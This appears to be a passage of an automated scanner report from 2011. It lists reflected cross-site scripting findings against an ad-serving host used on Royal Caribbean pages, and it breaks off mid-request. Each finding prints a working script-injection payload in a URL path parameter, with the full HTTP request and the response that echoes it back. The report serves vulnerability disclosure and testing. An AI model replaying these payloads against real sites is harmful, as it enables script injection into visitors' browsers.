function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="92293"-alert(1)-"3ff0c4ea86d=1";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){

   if((cookie_check("optouts=",document.cookie)).length == 0) {
       if((cookie_check("dlx_20100929=",d
...[SNIP]...
4.5. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1009225881@x96 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RoyalCaribbean/ZAP/1009225881@x96

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b899"><script>alert(1)</script>2024fa111c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RoyalCaribbean4b899"><script>alert(1)</script>2024fa111c/ZAP/1009225881@x96?_RM_HTML_title_=Cruise%20Deals%20%26%20Cruise%20Vacations%20-%20Royal%20Caribbean%20International%20-%20Royal%20Caribbean%20International&_RM_HTML_url_=http%3A//www.royalcaribbean.com/home.do&_RM_HTML_referrer_= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.royalcaribbean.com/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:33 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 337
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RoyalCaribbean4b899"><script>alert(1)</script>2024fa111c/ZAP/1317562423/x96/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...
4.6. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1009225881@x96 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RoyalCaribbean/ZAP/1009225881@x96

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 220cb"><script>alert(1)</script>ab66dce7cdf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RoyalCaribbean/ZAP220cb"><script>alert(1)</script>ab66dce7cdf/1009225881@x96?_RM_HTML_title_=Cruise%20Deals%20%26%20Cruise%20Vacations%20-%20Royal%20Caribbean%20International%20-%20Royal%20Caribbean%20International&_RM_HTML_url_=http%3A//www.royalcaribbean.com/home.do&_RM_HTML_referrer_= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.royalcaribbean.com/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:39 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 338
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RoyalCaribbean/ZAP220cb"><script>alert(1)</script>ab66dce7cdf/2103730740/x96/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...
4.7. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1009225881@x96 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RoyalCaribbean/ZAP/1009225881@x96

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b962"><script>alert(1)</script>12e307fef18 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RoyalCaribbean/ZAP/1009225881@x968b962"><script>alert(1)</script>12e307fef18?_RM_HTML_title_=Cruise%20Deals%20%26%20Cruise%20Vacations%20-%20Royal%20Caribbean%20International%20-%20Royal%20Caribbean%20International&_RM_HTML_url_=http%3A//www.royalcaribbean.com/home.do&_RM_HTML_referrer_= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.royalcaribbean.com/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:41 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 329
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RoyalCaribbean/ZAP/498879122/x968b962"><script>alert(1)</script>12e307fef18/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...
4.8. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1090617097@x96 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RoyalCaribbean/ZAP/1090617097@x96

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76222"><script>alert(1)</script>5259198acdc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RoyalCaribbean76222"><script>alert(1)</script>5259198acdc/ZAP/1090617097@x96?_RM_HTML_title_=Royal%20Caribbean%20International&_RM_HTML_url_=http%3A//www.royalcaribbean.com/search/processSearch.do%3Fip_server%3Dprdiphrase-unstruct-new222.dmz.rccl.com%253A200%26ip_text%3Dxss&_RM_HTML_referrer_=http%3A//www.royalcaribbean.com/beforeyouboard/home.do%3FcS%3DNAVBAR HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.royalcaribbean.com/search/processSearch.do?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:43:12 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 337
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RoyalCaribbean76222"><script>alert(1)</script>5259198acdc/ZAP/825149334/x96/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...
4.9. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1090617097@x96 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RoyalCaribbean/ZAP/1090617097@x96

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c5f7"><script>alert(1)</script>2e93ec6a50b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RoyalCaribbean/ZAP2c5f7"><script>alert(1)</script>2e93ec6a50b/1090617097@x96?_RM_HTML_title_=Royal%20Caribbean%20International&_RM_HTML_url_=http%3A//www.royalcaribbean.com/search/processSearch.do%3Fip_server%3Dprdiphrase-unstruct-new222.dmz.rccl.com%253A200%26ip_text%3Dxss&_RM_HTML_referrer_=http%3A//www.royalcaribbean.com/beforeyouboard/home.do%3FcS%3DNAVBAR HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.royalcaribbean.com/search/processSearch.do?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:43:14 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 337
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RoyalCaribbean/ZAP2c5f7"><script>alert(1)</script>2e93ec6a50b/125903992/x96/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...
4.10. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1090617097@x96 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RoyalCaribbean/ZAP/1090617097@x96

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61f00"><script>alert(1)</script>135c929b4df was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RoyalCaribbean/ZAP/1090617097@x9661f00"><script>alert(1)</script>135c929b4df?_RM_HTML_title_=Royal%20Caribbean%20International&_RM_HTML_url_=http%3A//www.royalcaribbean.com/search/processSearch.do%3Fip_server%3Dprdiphrase-unstruct-new222.dmz.rccl.com%253A200%26ip_text%3Dxss&_RM_HTML_referrer_=http%3A//www.royalcaribbean.com/beforeyouboard/home.do%3FcS%3DNAVBAR HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.royalcaribbean.com/search/processSearch.do?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:43:17 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 330
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RoyalCaribbean/ZAP/1936432529/x9661f00"><script>alert(1)</script>135c929b4df/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...
4.11. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1154839602@x96 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RoyalCaribbean/ZAP/1154839602@x96

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4740d"><script>alert(1)</script>dceda6e926e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RoyalCaribbean4740d"><script>alert(1)</script>dceda6e926e/ZAP/1154839602@x96?_RM_HTML_title_=Hot%20Deals%20-%20Royal%20Caribbean%20International&_RM_HTML_url_=http%3A//www.royalcaribbean.com/dealsandmore/hotdeals.do%3FcS%3DNAVBAR%26pnav%3D3%26snav%3D1&_RM_HTML_referrer_=http%3A//www.royalcaribbean.com/search/processSearch.do%3Fip_server%3Dprdiphrase-unstruct-new222.dmz.rccl.com%253A200%26ip_text%3Dxss HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.royalcaribbean.com/dealsandmore/hotdeals.do?cS=NAVBAR&pnav=3&snav=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:45:28 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 338
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RoyalCaribbean4740d"><script>alert(1)</script>dceda6e926e/ZAP/1969330568/x96/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...
4.12. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1154839602@x96 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RoyalCaribbean/ZAP/1154839602@x96

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a71c4"><script>alert(1)</script>279fadd2c16 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RoyalCaribbean/ZAPa71c4"><script>alert(1)</script>279fadd2c16/1154839602@x96?_RM_HTML_title_=Hot%20Deals%20-%20Royal%20Caribbean%20International&_RM_HTML_url_=http%3A//www.royalcaribbean.com/dealsandmore/hotdeals.do%3FcS%3DNAVBAR%26pnav%3D3%26snav%3D1&_RM_HTML_referrer_=http%3A//www.royalcaribbean.com/search/processSearch.do%3Fip_server%3Dprdiphrase-unstruct-new222.dmz.rccl.com%253A200%26ip_text%3Dxss HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.royalcaribbean.com/dealsandmore/hotdeals.do?cS=NAVBAR&pnav=3&snav=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:45:30 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 338
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RoyalCaribbean/ZAPa71c4"><script>alert(1)</script>279fadd2c16/1662320424/x96/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...
4.13. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1154839602@x96 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RoyalCaribbean/ZAP/1154839602@x96

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 779c2"><script>alert(1)</script>a0b177d5555 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RoyalCaribbean/ZAP/1154839602@x96779c2"><script>alert(1)</script>a0b177d5555?_RM_HTML_title_=Hot%20Deals%20-%20Royal%20Caribbean%20International&_RM_HTML_url_=http%3A//www.royalcaribbean.com/dealsandmore/hotdeals.do%3FcS%3DNAVBAR%26pnav%3D3%26snav%3D1&_RM_HTML_referrer_=http%3A//www.royalcaribbean.com/search/processSearch.do%3Fip_server%3Dprdiphrase-unstruct-new222.dmz.rccl.com%253A200%26ip_text%3Dxss HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.royalcaribbean.com/dealsandmore/hotdeals.do?cS=NAVBAR&pnav=3&snav=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:45:33 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 330
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RoyalCaribbean/ZAP/1964537063/x96779c2"><script>alert(1)</script>a0b177d5555/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...
4.14. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1413416439@x96 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RoyalCaribbean/ZAP/1413416439@x96

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41b45"><script>alert(1)</script>7d549cc21e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RoyalCaribbean41b45"><script>alert(1)</script>7d549cc21e/ZAP/1413416439@x96?_RM_HTML_title_=Royal%20Caribbean%20International&_RM_HTML_url_=http%3A//www.royalcaribbean.com/search/processSearch.do%3Fip_server%3Dprdiphrase-unstruct-new222.dmz.rccl.com%253A200%26ip_text%3Dxss&_RM_HTML_referrer_=http%3A//www.royalcaribbean.com/beforeyouboard/home.do%3FcS%3DNAVBAR HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.royalcaribbean.com/search/processSearch.do?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:45:19 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 337
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RoyalCaribbean41b45"><script>alert(1)</script>7d549cc21e/ZAP/1697048049/x96/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...
4.15. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1413416439@x96 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RoyalCaribbean/ZAP/1413416439@x96

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7596"><script>alert(1)</script>b218863f234 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RoyalCaribbean/ZAPd7596"><script>alert(1)</script>b218863f234/1413416439@x96?_RM_HTML_title_=Royal%20Caribbean%20International&_RM_HTML_url_=http%3A//www.royalcaribbean.com/search/processSearch.do%3Fip_server%3Dprdiphrase-unstruct-new222.dmz.rccl.com%253A200%26ip_text%3Dxss&_RM_HTML_referrer_=http%3A//www.royalcaribbean.com/beforeyouboard/home.do%3FcS%3DNAVBAR HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.royalcaribbean.com/search/processSearch.do?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:45:22 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 337
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RoyalCaribbean/ZAPd7596"><script>alert(1)</script>b218863f234/545133370/x96/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...
4.16. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1413416439@x96 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RoyalCaribbean/ZAP/1413416439@x96

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7850"><script>alert(1)</script>83c65d7cbe1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RoyalCaribbean/ZAP/1413416439@x96b7850"><script>alert(1)</script>83c65d7cbe1?_RM_HTML_title_=Royal%20Caribbean%20International&_RM_HTML_url_=http%3A//www.royalcaribbean.com/search/processSearch.do%3Fip_server%3Dprdiphrase-unstruct-new222.dmz.rccl.com%253A200%26ip_text%3Dxss&_RM_HTML_referrer_=http%3A//www.royalcaribbean.com/beforeyouboard/home.do%3FcS%3DNAVBAR HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.royalcaribbean.com/search/processSearch.do?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:45:24 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 329
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RoyalCaribbean/ZAP/589395884/x96b7850"><script>alert(1)</script>83c65d7cbe1/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...
4.17. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1795641562@x96 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RoyalCaribbean/ZAP/1795641562@x96

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c8ca"><script>alert(1)</script>c716c28ff0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RoyalCaribbean9c8ca"><script>alert(1)</script>c716c28ff0/ZAP/1795641562@x96?_RM_HTML_title_=Prepare%20For%20Your%20Cruise%20Before%20You%20Board%20-%20Royal%20Caribbean%20International&_RM_HTML_url_=http%3A//www.royalcaribbean.com/beforeyouboard/home.do%3FcS%3DNAVBAR&_RM_HTML_referrer_=http%3A//www.royalcaribbean.com/home.do HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.royalcaribbean.com/beforeyouboard/home.do?cS=NAVBAR
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; optouts=cookies; RMOPTOUT=3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:36 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 336
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RoyalCaribbean9c8ca"><script>alert(1)</script>c716c28ff0/ZAP/251078192/x96/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...
4.18. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1795641562@x96 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RoyalCaribbean/ZAP/1795641562@x96

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 743eb"><script>alert(1)</script>f2ee82d4d7a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RoyalCaribbean/ZAP743eb"><script>alert(1)</script>f2ee82d4d7a/1795641562@x96?_RM_HTML_title_=Prepare%20For%20Your%20Cruise%20Before%20You%20Board%20-%20Royal%20Caribbean%20International&_RM_HTML_url_=http%3A//www.royalcaribbean.com/beforeyouboard/home.do%3FcS%3DNAVBAR&_RM_HTML_referrer_=http%3A//www.royalcaribbean.com/home.do HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.royalcaribbean.com/beforeyouboard/home.do?cS=NAVBAR
